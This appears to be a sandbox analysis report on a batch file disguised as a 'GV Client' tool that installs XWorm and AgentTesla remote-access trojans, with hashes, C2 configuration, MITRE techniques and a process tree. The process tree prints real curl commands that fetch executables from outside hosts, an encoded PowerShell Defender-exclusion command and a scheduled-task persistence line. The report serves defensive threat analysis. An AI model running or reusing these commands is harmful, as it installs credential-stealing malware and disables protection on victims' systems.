agenttesla | 770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d

Analysis

max time kernel
54s
max time network
101s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
01-12-2023 19:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

#𝔾𝕍 ℂ𝕃𝕀𝔼ℕ𝕋 𝕍𝟛.𝟝.bat
Size

20KB
MD5

a7793c10f4e024c789964be67375ab2a
SHA1

988d0af9a4ca435dd084ce541a250f6ba57f590a
SHA256

770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
SHA512

50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
SSDEEP

384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO

Score

10^/10

agenttesla xworm keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

goofyah-26004.portmap.host:26004

Attributes

Install_directory
%AppData%
install_file
GVClientV4.exe

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect Xworm Payload 6 IoCs

Processes:

resource	yara_rule
C:\Windows\GV Client V4 BETA.exe	family_xworm
C:\Windows\GV Client V4 BETA.exe	family_xworm
C:\Windows\GV Client V4 BETA.exe	family_xworm
behavioral2/memory/2216-27-0x0000000000830000-0x000000000084A000-memory.dmp	family_xworm
C:\Users\Admin\AppData\Roaming\GVClientV4.exe	family_xworm
C:\Users\Admin\AppData\Roaming\GVClientV4.exe	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

AgentTesla payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1408-14-0x0000021F5DCF0000-0x0000021F5DF06000-memory.dmp	family_agenttesla

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a.exeGV Client V4 BETA.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation	a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\Control Panel\International\Geo\Nation	GV Client V4 BETA.exe

Drops startup file 2 IoCs

Processes:

GV Client V4 BETA.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk	GV Client V4 BETA.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GVClientV4.lnk	GV Client V4 BETA.exe

Executes dropped EXE 4 IoCs

Processes:

GV-Loader.exea.exeGV Client V4 BETA.exeGVClientV4.exe

pid process

1408 GV-Loader.exe
4792 a.exe
2216 GV Client V4 BETA.exe
4136 GVClientV4.exe

pid	process
1408	GV-Loader.exe
4792	a.exe
2216	GV Client V4 BETA.exe
4136	GVClientV4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

GV Client V4 BETA.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3455265224-196869244-2056873367-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GVClientV4 = "C:\\Users\\Admin\\AppData\\Roaming\\GVClientV4.exe"	GV Client V4 BETA.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

47 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

a.exe

description ioc process

File created C:\Windows\GV Client V4 BETA.exe a.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1416 schtasks.exe

flow	ioc
47	ip-api.com

description	ioc	process
File created	C:\Windows\GV Client V4 BETA.exe	a.exe

pid	process
1416	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

GV-Loader.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	GV-Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	GV-Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	GV-Loader.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2456 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3228 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

GV Client V4 BETA.exe

pid process

2216 GV Client V4 BETA.exe

pid	process
2456	notepad.exe

pid	process
3228	PING.EXE

pid	process
2216	GV Client V4 BETA.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGV Client V4 BETA.exe

pid	process
2848	powershell.exe
2848	powershell.exe
4912	powershell.exe
4912	powershell.exe
4912	powershell.exe
4816	powershell.exe
4816	powershell.exe
4816	powershell.exe
5116	powershell.exe
5116	powershell.exe
5116	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
2216	GV Client V4 BETA.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

GV-Loader.exeGV Client V4 BETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeGVClientV4.exe

description	pid	process
Token: SeDebugPrivilege	1408	GV-Loader.exe
Token: SeDebugPrivilege	2216	GV Client V4 BETA.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	4912	powershell.exe
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeDebugPrivilege	2216	GV Client V4 BETA.exe
Token: SeShutdownPrivilege	2216	GV Client V4 BETA.exe
Token: SeDebugPrivilege	4136	GVClientV4.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

GV Client V4 BETA.exe

pid process

2216 GV Client V4 BETA.exe

pid	process
2216	GV Client V4 BETA.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.exea.exeGV Client V4 BETA.exe

description	pid	process	target process
PID 2036 wrote to memory of 232	2036	cmd.exe	cacls.exe
PID 2036 wrote to memory of 232	2036	cmd.exe	cacls.exe
PID 2036 wrote to memory of 1596	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 1596	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 2728	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 2728	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 3332	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 3332	2036	cmd.exe	curl.exe
PID 2036 wrote to memory of 2456	2036	cmd.exe	notepad.exe
PID 2036 wrote to memory of 2456	2036	cmd.exe	notepad.exe
PID 2036 wrote to memory of 1408	2036	cmd.exe	GV-Loader.exe
PID 2036 wrote to memory of 1408	2036	cmd.exe	GV-Loader.exe
PID 2036 wrote to memory of 4792	2036	cmd.exe	a.exe
PID 2036 wrote to memory of 4792	2036	cmd.exe	a.exe
PID 2036 wrote to memory of 4792	2036	cmd.exe	a.exe
PID 2036 wrote to memory of 3228	2036	cmd.exe	PING.EXE
PID 2036 wrote to memory of 3228	2036	cmd.exe	PING.EXE
PID 4792 wrote to memory of 2848	4792	a.exe	powershell.exe
PID 4792 wrote to memory of 2848	4792	a.exe	powershell.exe
PID 4792 wrote to memory of 2848	4792	a.exe	powershell.exe
PID 4792 wrote to memory of 2216	4792	a.exe	GV Client V4 BETA.exe
PID 4792 wrote to memory of 2216	4792	a.exe	GV Client V4 BETA.exe
PID 2216 wrote to memory of 4912	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 4912	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 4816	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 4816	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 5116	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 5116	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 4484	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 4484	2216	GV Client V4 BETA.exe	powershell.exe
PID 2216 wrote to memory of 1416	2216	GV Client V4 BETA.exe	schtasks.exe
PID 2216 wrote to memory of 1416	2216	GV Client V4 BETA.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#𝔾𝕍 ℂ𝕃𝕀𝔼ℕ𝕋 𝕍𝟛.𝟝.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
2⤵
PID:232

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe
2⤵
PID:1596

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt
2⤵
PID:2728

C:\Windows\system32\curl.exe
curl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe
2⤵
PID:3332

C:\Windows\system32\notepad.exe
notepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:2456

C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe
2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Users\Admin\AppData\Roaming\a.exe
C:\Users\Admin\AppData\Roaming\a.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAYgBjACMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848

C:\Windows\GV Client V4 BETA.exe
"C:\Windows\GV Client V4 BETA.exe"
3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\GV Client V4 BETA.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GV Client V4 BETA.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GVClientV4.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GVClientV4.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GVClientV4" /tr "C:\Users\Admin\AppData\Roaming\GVClientV4.exe"
4⤵
- Creates scheduled task(s)
PID:1416

C:\Windows\system32\PING.EXE
ping -n 5 127.0.0.1
2⤵
- Runs ping.exe
PID:3228

C:\Users\Admin\AppData\Roaming\GVClientV4.exe
C:\Users\Admin\AppData\Roaming\GVClientV4.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9bc110200117a3752313ca2acaf8a9e1

SHA1
fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

SHA256
c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

SHA512
1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe

Filesize
1.6MB

MD5
7954b6812ec1eefe82b89dea0c1c8001

SHA1
db444d74258448e24d7aa1a26d71cea4c7fe492b

SHA256
42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231

SHA512
bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt

Filesize
555B

MD5
1c01acde55c409853a8bb588c523e810

SHA1
f4be783a9aaec4a89e3631b4e843fcc7d44bfdda

SHA256
a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872

SHA512
700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_okuqw3du.0u2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\GVClientV4.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Users\Admin\AppData\Roaming\GVClientV4.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
85KB

MD5
f4fdac362f860520d28385d92c288a7c

SHA1
9d7add3ef8a94821eff53b9f3b6634a204248a08

SHA256
bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367

SHA512
097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
85KB

MD5
f4fdac362f860520d28385d92c288a7c

SHA1
9d7add3ef8a94821eff53b9f3b6634a204248a08

SHA256
bb86852cf19f43f30561b6deb1f31735bebe157fcecdc74f5b7ba453c253b367

SHA512
097c06c9ae982308bd80be0d4d9c4bf439005f18861c49d662482dd30acdb52ca413e332e65899d5c058df681185cf0ce4bbf6e7a2ac40de75ed2cd4ba2acf6c

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
C:\Windows\GV Client V4 BETA.exe

Filesize
80KB

MD5
687f761162c7f606147b6cb4ec53f1b0

SHA1
c5becf98823cf61fa049da30a9bb74819aa62d75

SHA256
b29fb89932c2a4b8c10a2be6b5c0e5fccbe6f4e9a5eca3562983accd0b4d76c7

SHA512
29d5c802559c8d17d0959983999676f7f4925860ddea9b0e659e8931c2435b82804f02949ac4d8ea65ed1bbe814e731e5161a5170d1e589b79f609585bf82d26

Download Submit
memory/1408-10-0x0000021F433D0000-0x0000021F43572000-memory.dmp

Filesize
1.6MB

Download
memory/1408-113-0x0000021F5DCE0000-0x0000021F5DCF0000-memory.dmp

Filesize
64KB

Download
memory/1408-14-0x0000021F5DCF0000-0x0000021F5DF06000-memory.dmp

Filesize
2.1MB

Download
memory/1408-32-0x0000021F5DCE0000-0x0000021F5DCF0000-memory.dmp

Filesize
64KB

Download
memory/1408-13-0x0000021F5DCE0000-0x0000021F5DCF0000-memory.dmp

Filesize
64KB

Download
memory/1408-68-0x0000021F5DCE0000-0x0000021F5DCF0000-memory.dmp

Filesize
64KB

Download
memory/1408-12-0x0000021F43940000-0x0000021F43952000-memory.dmp

Filesize
72KB

Download
memory/1408-15-0x0000021F5DBA0000-0x0000021F5DBDC000-memory.dmp

Filesize
240KB

Download
memory/1408-11-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/1408-105-0x0000021F5DCE0000-0x0000021F5DCF0000-memory.dmp

Filesize
64KB

Download
memory/1408-65-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/2216-48-0x000000001B590000-0x000000001B5A0000-memory.dmp

Filesize
64KB

Download
memory/2216-94-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/2216-28-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/2216-27-0x0000000000830000-0x000000000084A000-memory.dmp

Filesize
104KB

Download
memory/2216-125-0x000000001B590000-0x000000001B5A0000-memory.dmp

Filesize
64KB

Download
memory/2848-82-0x00000000078B0000-0x0000000007953000-memory.dmp

Filesize
652KB

Download
memory/2848-104-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/2848-29-0x0000000001540000-0x0000000001576000-memory.dmp

Filesize
216KB

Download
memory/2848-30-0x00000000749D0000-0x0000000075180000-memory.dmp

Filesize
7.7MB

Download
memory/2848-66-0x000000007F410000-0x000000007F420000-memory.dmp

Filesize
64KB

Download
memory/2848-67-0x0000000006CA0000-0x0000000006CD2000-memory.dmp

Filesize
200KB

Download
memory/2848-58-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/2848-69-0x00000000707F0000-0x000000007083C000-memory.dmp

Filesize
304KB

Download
memory/2848-31-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/2848-81-0x0000000006C80000-0x0000000006C9E000-memory.dmp

Filesize
120KB

Download
memory/2848-146-0x000000007F410000-0x000000007F420000-memory.dmp

Filesize
64KB

Download
memory/2848-50-0x0000000006710000-0x000000000675C000-memory.dmp

Filesize
304KB

Download
memory/2848-85-0x0000000008030000-0x00000000086AA000-memory.dmp

Filesize
6.5MB

Download
memory/2848-87-0x00000000079F0000-0x0000000007A0A000-memory.dmp

Filesize
104KB

Download
memory/2848-33-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/2848-93-0x0000000007A60000-0x0000000007A6A000-memory.dmp

Filesize
40KB

Download
memory/2848-49-0x00000000066C0000-0x00000000066DE000-memory.dmp

Filesize
120KB

Download
memory/2848-143-0x0000000007C70000-0x0000000007C78000-memory.dmp

Filesize
32KB

Download
memory/2848-131-0x0000000007D20000-0x0000000007D3A000-memory.dmp

Filesize
104KB

Download
memory/2848-130-0x0000000007C40000-0x0000000007C54000-memory.dmp

Filesize
80KB

Download
memory/2848-100-0x00000000749D0000-0x0000000075180000-memory.dmp

Filesize
7.7MB

Download
memory/2848-47-0x00000000061C0000-0x0000000006514000-memory.dmp

Filesize
3.3MB

Download
memory/2848-42-0x0000000006010000-0x0000000006076000-memory.dmp

Filesize
408KB

Download
memory/2848-128-0x0000000007C30000-0x0000000007C3E000-memory.dmp

Filesize
56KB

Download
memory/2848-106-0x0000000007C80000-0x0000000007D16000-memory.dmp

Filesize
600KB

Download
memory/2848-126-0x0000000002EA0000-0x0000000002EB0000-memory.dmp

Filesize
64KB

Download
memory/2848-109-0x0000000007BF0000-0x0000000007C01000-memory.dmp

Filesize
68KB

Download
memory/2848-34-0x0000000005900000-0x0000000005F28000-memory.dmp

Filesize
6.2MB

Download
memory/2848-35-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/2848-36-0x0000000005FA0000-0x0000000006006000-memory.dmp

Filesize
408KB

Download
memory/4484-137-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/4484-142-0x0000016674650000-0x0000016674660000-memory.dmp

Filesize
64KB

Download
memory/4484-144-0x0000016674650000-0x0000016674660000-memory.dmp

Filesize
64KB

Download
memory/4816-102-0x000001379AC30000-0x000001379AC40000-memory.dmp

Filesize
64KB

Download
memory/4816-101-0x000001379AC30000-0x000001379AC40000-memory.dmp

Filesize
64KB

Download
memory/4816-86-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/4816-107-0x000001379AC30000-0x000001379AC40000-memory.dmp

Filesize
64KB

Download
memory/4816-103-0x000001379AC30000-0x000001379AC40000-memory.dmp

Filesize
64KB

Download
memory/4816-110-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/4912-64-0x0000011D45E70000-0x0000011D45E92000-memory.dmp

Filesize
136KB

Download
memory/4912-83-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/4912-51-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/4912-62-0x0000011D2CE60000-0x0000011D2CE70000-memory.dmp

Filesize
64KB

Download
memory/4912-63-0x0000011D2CE60000-0x0000011D2CE70000-memory.dmp

Filesize
64KB

Download
memory/5116-114-0x000001D0E3280000-0x000001D0E3290000-memory.dmp

Filesize
64KB

Download
memory/5116-129-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download
memory/5116-112-0x000001D0E3280000-0x000001D0E3290000-memory.dmp

Filesize
64KB

Download
memory/5116-111-0x00007FF83FAD0000-0x00007FF840591000-memory.dmp

Filesize
10.8MB

Download